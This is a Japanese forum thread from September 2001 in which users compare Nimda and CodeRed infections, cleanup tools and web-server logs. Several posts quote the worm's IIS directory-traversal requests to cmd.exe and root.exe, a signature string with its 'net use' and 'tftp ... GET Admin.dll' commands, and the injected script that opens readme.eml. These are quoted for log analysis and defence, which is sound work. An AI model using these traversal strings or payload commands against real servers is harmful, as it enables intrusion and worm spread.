ちなみにCDの中身にIEのセットアップファイルは
ありませんでした。Win2000SP2へのアップデートという事で、
全部いっしょくたになっているみたいです。

そこに行ってみればわかるじゃん

ごめん
>850　に

とりあえず、http://www.trendmicro.co.jp/nimda/tool.asp　を実行して
*.eml、system.ini、*.htmなんかは削除、修正できたみたいだけど、
使用頻度の高いexeに感染するとかいうのもこれで直ったのかね。
ひょっとして、感染した実行ファイルはバッサリ削除されたのか？

ちなみに、ウチではhtmファイルの追記は起こってなかった。

>>850
↓CERTで公開。nimdaの足あと。
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c..
/winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

>>856
ありがとう！
下のURLのCodeBlueの説明には
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

=================================
Code Blue は HTTP GET 要求を送信し、「Web サーバーフォルダへの侵入」
の脆弱点を悪用しようと試みます。こうした要求は、次のような形式です。

GET /.. [Encoded characters] ../winnt/system32/cmd.exe?/c+dir
==================================

とあるので、、、ログでは区別できないってことですかね？？

Codered
ﾎﾜｲﾄﾊｳｽを狙った中の田舎学生の仕業。

Codered�U
Coderedにブチ切れたｱﾒ公が中狙いで報復。殆どがﾁｮﾝで爆発。jappppも延焼。

nimda
Codered�Uにブチ切れた中の反撃。

http://www.trendmicro.co.jp/nimda/のページ、
内部サーバエラーです、と出ます。
これってダウソしてるってことですか?

>>858
セキュリティ板で半角カナつかうな

>>857
CodeBlueは最初にHEADが来るらしいよ。
いきなりGETがくるのはNimdaかと。

ﾏﾝｾｰ

C:\Windows\Program files\nimda\の中にある
setup.exeは実行しても害は無いでしょうか？

>>861
おお、そうでしたか。ありがとう！　　

nimdaをムは小さく発音で「二（ム）ダー」と呼ぶのはダメですか?（ｗ

>>857
突いてくる穴は同じなんだよね。ブルーと。
レッドのバックドア利用するのも同じだし。
>>853
が言うようにそこ行っててみれば解るだろうね。
index.hml直下にreadme.eml有ればnimdaと。。
・・どっかでブルーのフットプリント見たような
気がする。。何か少し違ったような。探してみる。
でも、アクセス時点で弾いてれば、それ以後の活
動の足跡は残らないだろうね。

http://www.koto.ed.jp/motokaga-sho/

小学校のほっぽらかしのページとか、結構ひっかかりまくります。

Cuam使用の人は、取り敢えず*readme.emlをCloseURLに入れる
といいかも。

interqのウェブページ、軒並み引っかかっている模様。注意。

今回、まだ情報が安定してないけど、
そろそろPart2のスレ準備せんと。。。

これ見る？
ttp://www.stride.co.jp/~z32/cgi-bin/worm.cgi

トレンドマイクロ NIMDA対策ページ。
http://www.trendmicro.co.jp/nimda/index.asp

ログ見てたら
GET /scripts/root.exe?/c+dir
で200を返してるところがあったんだけどこれってマズイ？
他は404か500なんだけど。

当たり前なんだけど、404なページにも当然ながら仕込まれていますね。

http://www.koto.ed.jp/aaa

こまったもんだ…

>>872
http://www.nda.co.jp/memo/RFC2068.html
エラーコード表

平素より MSN をご利用いただき、まことにありがとうございます。

9 月 18 日夜 11 時より、MSN（http://www.msn.co.jp/）において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。

また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。

自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1

これ以外のブラウザを利用されている方は、MSN（http://www.msn.co.jp/）にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。

「Nimda」には以下の機能があります
1. 電子メールによって「Nimda」を配付
2. ネットワーク不の他のコンピューターに「Nimda」をインストール
3. インターネット不のサーバーにアクセスして、可能であれば「Nimda」をインストール

MSN（http://www.msn.co.jp/）は､月間ユニークユーザー数1600万人（2001年7月）を誇る
日本で有数のウイルスポータルサイトです｡今後ともよろしくお願いします。

>>875
わらえないよ。

952 名前：ニムダをﾊﾝｸﾞﾙで書いてみました。
投稿日：01/09/19 10:17 ID:OO3wQbOI
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□
□■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□
□■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■
□□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□

>>877
ちなみに、ハングル語では、何か意味あるの？＞ニムダ

バックドア完全に塞がずにＳＰ２で対処したと思っているのも掃討多いみたいだな。
２Ｋアップデート版で知らずにＩＩＳ走らせているうすら馬鹿。
１台でサーバーとクライアントを共用している貧乏人。

そういうのに限ってＭ＄に損害賠償請求とか騒いでる。

>>879
しょうがないじゃん！びんぼーなんだもん

ノートン入れて、昨日あたりだと警告バンバン出てたのに
今日はまったく警告なし。
おかしいな？と思って感染先のソースを見ると

<html><script language="JavaScript">new Object()
</script></html>

になってた（ノートンにされてた？）

ノートン入ってないパソで同じページ見ると、ちゃんと

<html>
<script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")
</script>

になってる。
やるな、ノートン。

tide136.microsoft.com というマシンからアタックがくる。
なんで自社パッチをあてないんだろう。

>>880
貧乏なヤツがサーバ立てるなこのクソヤロウ

よくわかんないんだけど、「ネットワークの共有を外す」って
会社のＬＡＮとかを外すって事？
「ファイルの共有」の共有を外すだけじゃだめ？

ＦＭーＴＯＷＮＳ　ＯＳでも感染するんかな？

>>222
ノートン君だと

/scripts /MSADC /c /d /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin
/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts
/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts
/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?
/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

ここまでやって初めて反応します。
これ、メモ帳に張って.txtで開こうとしても開けな〜い。

トレンドマイクロのNimdaページ繋がらないよ〜（(;。;)

Windows95 だと大丈夫なんでしょうか？
IE2.xしか入ってないマシンとか。

>>884
システム管理者の指示に従え。
居なければ専門家に金出して調べて貰え。
素人が社内のネットワークいじるからダメなんだって。

>889
今のとこシステム管理者が何の動きも見せないので。
他社に添付ファイル付メールを送る必要があったんで、
ひとまずオンラインスキャンして送ったんですけど。

今ならウィルスに感染してないみたいだし、共有ファイルは
部署内使用が主だから、外した方がいいなら外しても問題ないかな
とちょっと思ったの。スマソ

なんか root.exe に来るやつも結構あるんですが、これはNimdaとは別種？

>>833

ﾊｱ？（´Д｀；）

MacでWebサイト立ててて、そこWinとファイル共有してたら、Macからでも感染。

Windows全部スキャンしても、MacのウイルスチェッカにNimdaはひっかからないから、Macは温床に

IE6 フルでダウンロードするにはどうすればいいでしょうか？

>>892

>>451

メールが来たと思ったら
【小泉内閣メールマガジン 2001/09/20】難局にひるまず立ち向かおう！！
だった。

14:30くらいにピタリとNimdaのリクエストが
来なくなった。それ以来CodeRedIIが３発来た
だけ。正直、気味悪い。

IIS4.0でウイルス駆除した後に共有だけ勝手にされちゃうんだけど
これの直し方知ってる?ウイルス自体はすべてなくなったんだけど
共有だけ起動のたびにかってにされるのよ

スマソ、勝手に増やされた削除できないユーザーってどう対処してる？

既出だったら、ﾚｽ番おしえてm(_ _)m

>>898
かなり減ったね。でもうちはまだ来るよ。
かなり派手な動きするし、TVや一般の新聞やらでも
出てるので、さすがのヴォケ管理者でも気が付いた
のが多いかと思われ。

多分「とりあえずサーバ落としておくか」ってところが
多いんじゃないかな。

管理共有だヴォケ！
http://homepage2.nifty.com/winfaq/wxp/network.html#910
それといい加減IISもう使うな。

>>902　は　>>899　へのレスな

トレンドマイクロが駆除修復ツールを出してましたよ。

http://www.trendmicro.co.jp/nimda/

>>901
サーバー落としただけでなく、インターネット接続を切った会社が多い模様！（ｗ

今来た。ホッ (藁

でも14:30以降ずいぶん減った。
上流でなんか対策してるのかも。
「ニムダバスター」とか (藁

案外、管理共有って知ってる人いないんだねぇ。
真っ先に切るけど。私。

>>899
管理共有のことだったらそれが普通。
もちろん共有を外すことも可能。

ガンガン来てます。ニムダさん。ログがめちゃくちゃです。ニムダさん。

スポーツ新聞には、有明に上陸「グレート・ニタ」って出てた。
て、何？

Nimdaログでかいな。
たまに来るCodeRedがかわいく思える(w

俺のＰＣのnimdaアクセスログだよ
０４時 119 |||||||||||
０５時 239 |||||||||||||||||||||||
０６時 175 |||||||||||||||||
０７時 156 |||||||||||||||
０８時 142 ||||||||||||||
０９時 100 ||||||||||
１０時 151 |||||||||||||||
１１時 390 |||||||||||||||||||||||||||||||||||||||
１２時 554 |||||||||||||||||||||||||||||||||||||||||||||||||||||||
１３時 604 ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
１４時 288 ||||||||||||||||||||||||||||
１５時 260 ||||||||||||||||||||||||||

>>911
何のログもない、さみしいニダ。
Nimdaログ見せてほしいニダ。

>>911
クラカーさんは、それが目的。ログ流し。

>>912
それはJSTでのログかい？
CoderedIIの時は東南アジアの夜時間帯にピークがあった。
ニムダは北米狙い撃ち。
しかーし、テロではないテロだったらレジストリ引っ掻き回してクライアント起動不能にするだろうから。

でっかい日の丸(´Д｀;)
極東地域で被害が大きいね。

http://www.security.nl/misc/codered-stats/geodist.gif

>>916
それは俺がこのスレで張った画像だ。
Coderedって書いてあるのが読めないのか?

>>916
・・・・・・恐えぇ (;´Д｀)

>>916
ってか、、、オセアニア飲み込みそうな大きさなんですけど。。

>>916
それCodeRedだし中心はソウルよ。

>>915
かき回してしまったら、踏み台に使えないよ。
ある程度は繁殖してもらわないと困るし、
バックドアがないと目的のサイトに侵入できなくなるし。

% sed -n '/MSADC/s/.*\[\([^:]*\).*/\1/p' access.log | uniq -c
15 18/Sep/2001
235 19/Sep/2001
99 20/Sep/2001

…少ない？

┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ　　　　　　　 .┃
┃強烈なトラフィック攻撃！　　 　 　 　 ┃
┗━━━━━━━━━━━━━━━┛

　　　　　　　　|
　　　 ＼／￣￣＼／　　／￣￣￣￣￣￣￣￣￣￣
　　　　　|::; ｀皿´　|　　＜　トトトトトトトトト、トラフィック！！
　　　 ￣|:::;ヽ　　　|￣　　＼＿＿＿＿＿＿＿＿＿＿
　　　　　＼__＼_／＼
　　　　　 / 　　　 ＼
　　　　　//|　_　　 ｌ |　　＿
　　　　/| |／　ヽ　 | |／っ､､ヽ
　　　/　＼/⌒゛゛/ ＼/ 　 ```
　　/　　　|　　 /　ヽ。　　　　ヽ。
　/　　　　| 　| |　　　　。　　　　。
　〜〜〜 |　|| |　　　　　。　 　　。
　　　 　　 | / | |　　　　　　ヽ　 　｡　　　｡
　　　　 　//　| |　　　　　　　 　 ＿＿＿
　　　　 //　　| |　　 　　　　　／´∀｀；;::＼　＜グワァァァァ！！重い！！
　　　　//　 　| |　　　　　　 /　　　　/::::::::::|
　　　　U　　　U　　　　　　 | ./|　　/:::::|::::::|
.　　　　　　　　　　　　　　　| |｜／::::::::|::::::|

>>923
あの、、、全然強烈に見えないんですけど。。

aa2000030222007.userreverse.dion.ne.jp
から nimda アクセスのログがいっぱい
あるんですが、、
pppサーバの名前とも思えないから、dion内部で使われているマシンか？

>>925
HTTPリバースプロキシかな？

こちらへどうぞ。

Nimda !! その弐
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000973617

http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/
http://210.210.21.33/

起きてたのかコピペ君ここの板は頭いい奴多くてかなわん。
俺と遊んでくれ。

おーいホントに寝たのか？

あながちマヌケでもないようね。

>>923
激ﾜﾗﾀ。今まさにそれ食ってた。

こっちのほうがおもろいよ。

ttp://210.124.76.100/

UGTOP＝ぶさいく典型的ヲタの集まり
Backsection＝今風若者の集まり

SP2 をあてたあとに感染する例は？
readme.exe を添付ファイルで受信してダブルクリックすると
感染するのでしょうか？

SP2でも、添付ファイルreadme.exeを開いたり、
wavファイルに化けたヤツをWMPで再生しようとしたり、
感染したサイトで出たダウンロードダイアログを実行すると
感染します。IE、OEを使うときは、万が一の為にも
ウイルス検知ソフト定義ファイル最新版を起動しておこう。

SP2を導入すれば、Webを見ただけでの感染は防げるけどね。
わざわざ実行すれば、そりゃ感染するよ。

From : [email protected]
Reply-To : [email protected]
To : [email protected]
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From [email protected] Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
>>> RCPT TO:<[email protected]>
<<< 250 OK - Recipient <[email protected]>
>>> QUIT
<<< 221 closing connection
問題あり：不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。